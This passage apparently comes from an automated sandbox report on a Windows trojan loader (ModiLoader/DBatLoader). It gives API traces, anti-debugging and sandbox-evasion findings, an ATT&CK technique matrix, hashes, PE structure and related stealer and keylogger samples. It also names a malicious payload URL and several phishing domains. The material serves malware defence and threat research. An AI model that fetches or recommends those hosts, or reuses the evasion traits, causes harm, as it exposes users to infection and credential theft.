            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028AA917 push 028AA950h; ret 0_2_028AA948
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_0289C95E push 0289CCF2h; ret 0_2_0289CCEA
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028A2EE0 push 028A2F56h; ret 0_2_028A2F4E
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028BBFA0 push 028BC1C8h; ret 0_2_028BC1C0
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028A2FEB push 028A3039h; ret 0_2_028A3031
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028A2FEC push 028A3039h; ret 0_2_028A3031
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028A5DFC push ecx; mov dword ptr [esp], edx 0_2_028A5DFE
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028AA954 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_028AA954
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028958B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028958B4
            Source: UAHIzSm2x2.exe, 00000000.00000002.3445632764.00000000007E4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW;
            Source: UAHIzSm2x2.exe, 00000000.00000002.3445632764.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000002.3445632764.000000000079E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | API call chain: ExitProcess graph end node | graph_0-29066

            Anti Debugging

            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028AF024 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_028AF024
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Process queried: DebugPort
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_028A8798 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_028A8798
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02895A78
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: GetLocaleInfoA,0_2_0289A790
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: GetLocaleInfoA,0_2_0289A744
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02895B84
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_0289918C GetLocalTime,0_2_0289918C
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exe | Code function: 0_2_0289B70C GetVersionExA,0_2_0289B70C
            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
            Initial Access: 1 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
            Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
            Persistence: 1 Valid Accounts; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
            Privilege Escalation: 1 Valid Accounts; 1 Access Token Manipulation; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
            Defense Evasion: 1 Valid Accounts; 1 Access Token Manipulation; 1 Virtualization/Sandbox Evasion; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; Compile After Delivery
            Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
            Discovery: 1 System Time Discovery; 1 Query Registry; 111 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 1 System Network Connections Discovery; 1 File and Directory Discovery; 24 System Information Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
            Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
            Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
            Source | Detection | Scanner | Label
            UAHIzSm2x2.exe | 78% | Virustotal |
            UAHIzSm2x2.exe | 88% | ReversingLabs | Win32.Trojan.ModiLoader
            No Antivirus matches
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            amazonenviro.com | 166.62.27.188 | true | false | | high

            Name | Malicious | Antivirus Detection | Reputation
            http://amazonenviro.com/245_Aiymwhpjxsg | true | Avira URL Cloud: malware | unknown
            https://amazonenviro.com/245_Aiymwhpjxsg | false | Avira URL Cloud: malware | unknown
                    IP | Domain | Country | ASN | ASN Name | Malicious
                    166.62.27.188 | amazonenviro.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | false
                    Joe Sandbox version: 42.0.0 Malachite
                    Analysis ID: 1590517
                    Start date and time: 2025-01-14 08:23:07 +01:00
                    Joe Sandbox product: CloudBasic
                    Overall analysis duration: 0h 5m 7s
                    Hypervisor based Inspection enabled: false
                    Report type: full
                    Cookbook file name: default.jbs
                    Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed: 5
                    Number of new started drivers analysed: 0
                    Number of existing processes analysed: 0
                    Number of existing drivers analysed: 0
                    Number of injected processes analysed: 0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode: default
                    Analysis stop reason: Timeout
                    Sample name: UAHIzSm2x2.exe (renamed because original name is a hash value)
                    Original Sample Name: 483ab6bd562b28782d0999abec4f57f5.exe
                    Detection: MAL
                    Classification: mal84.troj.evad.winEXE@1/0@1/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 99%
                    • Number of executed functions: 24
                    • Number of non-executed functions: 38
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    Time | Type | Description
                    02:24:06 | API Interceptor | 63x Sleep call for process: UAHIzSm2x2.exe modified
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                    166.62.27.188 | zYj1wg0cM2.doc | malicious | DBatLoader | amazonenviro.com/245_Aiymwhpjxsg
                    166.62.27.188 | ENQ-0092025.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | amazonenviro.com/245_Aiymwhpjxsg
                    166.62.27.188 | yxU3AgeVTi.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | amazonenviro.com/245_Aiymwhpjxsg
                    166.62.27.188 | ITT # KRPBV2663 .doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | amazonenviro.com/245_Aiymwhpjxsg
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                    amazonenviro.com | LbZ88q4uPa.exe | malicious | DBatLoader | 166.62.27.188
                    amazonenviro.com | PI ITS15235.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 166.62.27.188
                    amazonenviro.com | zYj1wg0cM2.doc | malicious | DBatLoader | 166.62.27.188
                    amazonenviro.com | ENQ-0092025.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 166.62.27.188
                    amazonenviro.com | yxU3AgeVTi.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 166.62.27.188
                    amazonenviro.com | ITT # KRPBV2663 .doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 166.62.27.188
                    amazonenviro.com | PI ITS15235.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 166.62.27.188
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                    AS-26496-GO-DADDY-COM-LLCUS | LbZ88q4uPa.exe | malicious | DBatLoader | 166.62.27.188
                    AS-26496-GO-DADDY-COM-LLCUS | PI ITS15235.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 166.62.27.188
                    AS-26496-GO-DADDY-COM-LLCUS | trow.exe | malicious | Unknown | 107.180.98.101
                    AS-26496-GO-DADDY-COM-LLCUS | https://upholl-xlognusa.godaddysites.com/ | malicious | Unknown | 198.71.248.123
                    AS-26496-GO-DADDY-COM-LLCUS | 3.elf | malicious | Unknown | 184.168.52.170
                    AS-26496-GO-DADDY-COM-LLCUS | http://logiinnmaskemettaha93.godaddysites.com/ | malicious | HTMLPhisher | 198.71.248.123
                    AS-26496-GO-DADDY-COM-LLCUS | http://app-metamask.godaddysites.com/ | malicious | Unknown | 198.71.248.123
                    AS-26496-GO-DADDY-COM-LLCUS | http://metamssk-luggiinn.godaddysites.com/ | malicious | HTMLPhisher | 198.71.248.123
                    AS-26496-GO-DADDY-COM-LLCUS | http://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/ | malicious | HTMLPhisher, Mamba2FA | 72.167.84.16
                    AS-26496-GO-DADDY-COM-LLCUS | n0nsAzvYNd.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 166.62.28.135
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                    a0e9f5d64349fb13191bc781f81f42e1 | LbZ88q4uPa.exe | malicious | DBatLoader | 166.62.27.188
                    a0e9f5d64349fb13191bc781f81f42e1 | PI ITS15235.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 166.62.27.188
                    a0e9f5d64349fb13191bc781f81f42e1 | 183643586-388657435.07.exe | malicious | Unknown | 166.62.27.188
                    a0e9f5d64349fb13191bc781f81f42e1 | uo9m.exe | malicious | LummaC | 166.62.27.188
                    a0e9f5d64349fb13191bc781f81f42e1 | uo9m.exe | malicious | LummaC | 166.62.27.188
                    a0e9f5d64349fb13191bc781f81f42e1 | YYYY-NNN AUDIT DETAIL REPORT .docx | malicious | Unknown | 166.62.27.188
                    a0e9f5d64349fb13191bc781f81f42e1 | msit.exe | malicious | LummaC Stealer | 166.62.27.188
                    a0e9f5d64349fb13191bc781f81f42e1 | tesr.exe | malicious | LummaC Stealer | 166.62.27.188
                    No context
                    No created / dropped files found
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.188493218292404
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.38%
                    • InstallShield setup (43055/19) 0.43%
                    • Windows Screen Saver (13104/52) 0.13%
                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    File name:UAHIzSm2x2.exe
                    File size:1'161'216 bytes
                    MD5:483ab6bd562b28782d0999abec4f57f5
                    SHA1:b758556af2b98708b97a6c3bdbd1e9f2905ed690
                    SHA256:e5393c34240b7e1b8a35052d7e151c324a4aa6424b5a6e1a45717157042fb9ab
                    SHA512:6f3f60153b3c4b1a780c80d59a4e17d8c109f57a1380f73b50498ac85a081b804d0f7c0ffade4ac193656b3135dedddcd607121d9571b4c3baf34103e36d129d
                    SSDEEP:24576:Gw6yj+R7ydItm/2uQAGYDKAVcpzWc4ctu:GDBR2KTYDKArc4Ku
                    TLSH:8E359D3790B387FDC17289798F5F9BE4682EA9303928BA52FED17D0D5B242417838197
                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                    Icon Hash:4f858a8c8e8e8946
                    Entrypoint:0x46e80c
                    Entrypoint Section:.itext
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    DLL Characteristics:
                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:44c8864bd68c3bff94639c69671ea4b7
                    Instruction
                    push ebp
                    mov ebp, esp
                    add esp, FFFFFFF0h
                    mov eax, 0046D250h
                    call 00007F131CE33C51h
                    mov ecx, dword ptr [00470E9Ch]
                    mov eax, dword ptr [00470D8Ch]
                    mov eax, dword ptr [eax]
                    mov edx, dword ptr [0046CB00h]
                    call 00007F131CE89AE9h
                    mov eax, dword ptr [00470D8Ch]
                    mov eax, dword ptr [eax]
                    call 00007F131CE89B5Dh
                    call 00007F131CE31AB0h
                    lea eax, dword ptr [eax+00h]
                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x75000 | 0x266e | .idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x82000 | 0xa1c00 | .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7a000 | 0x7ce8 | .reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x79000 | 0x18 | .rdata
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x75754 | 0x600 | .idata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    .text | 0x1000 | 0x6c4c0 | 0x6c600 | 69c4173c38ad27686fb46f69fd79ec91 | False | 0.5070961288927336 | data | 6.531494017298441 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .itext | 0x6e000 | 0x848 | 0xa00 | 639613140a642faedd01bff468c3e3cf | False | 0.523828125 | data | 5.552779847613545 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .data | 0x6f000 | 0x1f40 | 0x2000 | 53b6dd6978c858db7e9faa57954b9c18 | False | 0.3963623046875 | data | 3.804120578626792 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .bss | 0x71000 | 0x36ec | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata | 0x75000 | 0x266e | 0x2800 | f0f9a1156b641e5ea253cb6ddcaf08ba | False | 0.3103515625 | data | 4.872671403071516 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .tls | 0x78000 | 0x34 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rdata | 0x79000 | 0x18 | 0x200 | 5b11e123dd9b7f6d94b27d2ad6e9bc83 | False | 0.05078125 | data | 0.2108262677871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc | 0x7a000 | 0x7ce8 | 0x7e00 | 3b0f62de599dc8a77438a9e2115a0b81 | False | 0.6107390873015873 | data | 6.679791141044884 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    .rsrc | 0x82000 | 0xa1c00 | 0xa1c00 | d31868c6483367700b95815234a2e180 | False | 0.50098410935085 | data | 6.976886685856244 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                    RT_CURSOR | 0x83244 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
                    RT_CURSOR | 0x83378 | 0x134 | data | English | United States | 0.4642857142857143
                    RT_CURSOR | 0x834ac | 0x134 | data | English | United States | 0.4805194805194805
                    RT_CURSOR | 0x835e0 | 0x134 | data | English | United States | 0.38311688311688313
                    RT_CURSOR | 0x83714 | 0x134 | data | English | United States | 0.36038961038961037
                    RT_CURSOR | 0x83848 | 0x134 | data | English | United States | 0.4090909090909091
                    RT_CURSOR | 0x8397c | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
                    RT_BITMAP | 0x83ab0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
                    RT_BITMAP | 0x83c80 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
                    RT_BITMAP | 0x83e64 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
                    RT_BITMAP | 0x84034 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
                    RT_BITMAP | 0x84204 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
                    RT_BITMAP | 0x843d4 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
                    RT_BITMAP | 0x845a4 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
                    RT_BITMAP | 0x84774 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
                    RT_BITMAP | 0x84944 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
                    RT_BITMAP | 0x84b14 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
                    RT_BITMAP | 0x84ce4 | 0x81940 | Device independent bitmap graphic, 971 x 182 x 24, image size 530712 | English | United States | 0.497995297238635
                    RT_BITMAP | 0x106624 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.39864864864864863
                    RT_BITMAP | 0x10674c | 0x128 | Device independent bitmap graphic, 19 x 16 x 4, image size 192 | English | United States | 0.3885135135135135
                    RT_BITMAP | 0x106874 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.3885135135135135
                    RT_BITMAP | 0x10699c | 0xe8 | Device independent bitmap graphic, 13 x 16 x 4, image size 128 | English | United States | 0.36637931034482757
                    RT_BITMAP | 0x106a84 | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States | 0.3614864864864865
                    RT_BITMAP | 0x106bac | 0x128 | Device independent bitmap graphic, 20 x 16 x 4, image size 192 | English | United States | 0.3783783783783784
                    RT_BITMAP | 0x106cd4 | 0xd0 | Device independent bitmap graphic, 13 x 13 x 4, image size 104 | English | United States | 0.49038461538461536
                    RT_BITMAP | 0x106da4 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.3716216216216216
                    RT_BITMAP | 0x106ecc | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States | 0.2905405405405405
                    RT_BITMAP | 0x106ff4 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.38175675675675674
                    RT_BITMAP | 0x10711c | 0x128 | Device independent bitmap graphic, 19 x 16 x 4, image size 192 | English | United States | 0.3783783783783784
                    RT_BITMAP | 0x107244 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.3783783783783784
                    RT_BITMAP | 0x10736c | 0xe8 | Device independent bitmap graphic, 12 x 16 x 4, image size 128 | English | United States | 0.3620689655172414
                    RT_BITMAP | 0x107454 | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States | 0.3581081081081081
                    RT_BITMAP | 0x10757c | 0x128 | Device independent bitmap graphic, 20 x 16 x 4, image size 192 | English | United States | 0.375
                    RT_BITMAP | 0x1076a4 | 0xd0 | Device independent bitmap graphic, 13 x 13 x 4, image size 104 | English | United States | 0.47115384615384615
                    RT_BITMAP | 0x107774 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.36824324324324326
                    RT_BITMAP | 0x10789c | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States | 0.28716216216216217
                    RT_BITMAP | 0x1079c4 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.3885135135135135
                    RT_BITMAP | 0x107aec | 0x128 | Device independent bitmap graphic, 19 x 16 x 4, image size 192 | English | United States | 0.375
                    RT_BITMAP | 0x107c14 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.375
                    RT_BITMAP | 0x107d3c | 0xe8 | Device independent bitmap graphic, 13 x 16 x 4, image size 128 | English | United States | 0.36637931034482757
                    RT_BITMAP | 0x107e24 | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States | 0.35135135135135137
                    RT_BITMAP | 0x107f4c | 0x128 | Device independent bitmap graphic, 20 x 16 x 4, image size 192 | English | United States | 0.36486486486486486
                    RT_BITMAP | 0x108074 | 0xd0 | Device independent bitmap graphic, 13 x 13 x 4, image size 104 | English | United States | 0.47115384615384615
                    RT_BITMAP | 0x108144 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.3581081081081081
                    RT_BITMAP | 0x10826c | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States | 0.28716216216216217
                    RT_BITMAP | 0x108394 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
                    RT_ICON | 0x10847c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 40314 x 40314 px/m | | | 0.40560165975103735
                    RT_DIALOG | 0x10aa24 | 0x52 | data | | | 0.7682926829268293
                    RT_DIALOG | 0x10aa78 | 0x52 | data | | | 0.7560975609756098
                    RT_STRING | 0x10aacc | 0x35c | data | | | 0.45348837209302323
                    RT_STRING | 0x10ae28 | 0x2d8 | data | | | 0.4642857142857143
                    RT_STRING | 0x10b100 | 0xc0 | data | | | 0.6770833333333334
                    RT_STRING | 0x10b1c0 | 0xec | data | | | 0.6483050847457628
                    RT_STRING | 0x10b2ac | 0x350 | data | | | 0.43514150943396224
                    RT_STRING | 0x10b5fc | 0x3cc | data | | | 0.37962962962962965
                    RT_STRING | 0x10b9c8 | 0x388 | data | | | 0.4092920353982301
                    RT_STRING | 0x10bd50 | 0x418 | data | | | 0.36736641221374045
                    RT_STRING | 0x10c168 | 0x140 | data | | | 0.515625
                    RT_STRING | 0x10c2a8 | 0xcc | data | | | 0.6127450980392157
                    RT_STRING | 0x10c374 | 0x1ec | data | | | 0.5345528455284553
                    RT_STRING | 0x10c560 | 0x3b0 | data | | | 0.326271186440678
                    RT_STRING | 0x10c910 | 0x354 | data | | | 0.4107981220657277
                    RT_STRING | 0x10cc64 | 0x2a4 | data | | | 0.4363905325443787
                    RT_RCDATA | 0x10cf08 | 0x10 | data | | | 1.5
                    RT_RCDATA | 0x10cf18 | 0x338 | data | | | 0.6905339805825242
                    RT_RCDATA | 0x10d250 | 0x1657c | GIF image data, version 89a, 360 x 360 | English | United States | 0.5910441889942742
                    RT_RCDATA | 0x1237cc | 0x369 | Delphi compiled form 'TForm1' | | | 0.6071019473081328
                    RT_GROUP_CURSOR | 0x123b38 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
                    RT_GROUP_CURSOR | 0x123b4c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
                    RT_GROUP_CURSOR | 0x123b60 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
                    RT_GROUP_CURSOR | 0x123b74 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
                    RT_GROUP_CURSOR | 0x123b88 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
                    RT_GROUP_CURSOR | 0x123b9c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
                    RT_GROUP_CURSOR | 0x123bb0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
                    RT_GROUP_ICON | 0x123bc4 | 0x14 | data | | | 1.25
                    DLL | Import
                    oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
                    advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                    user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                    kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                    kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
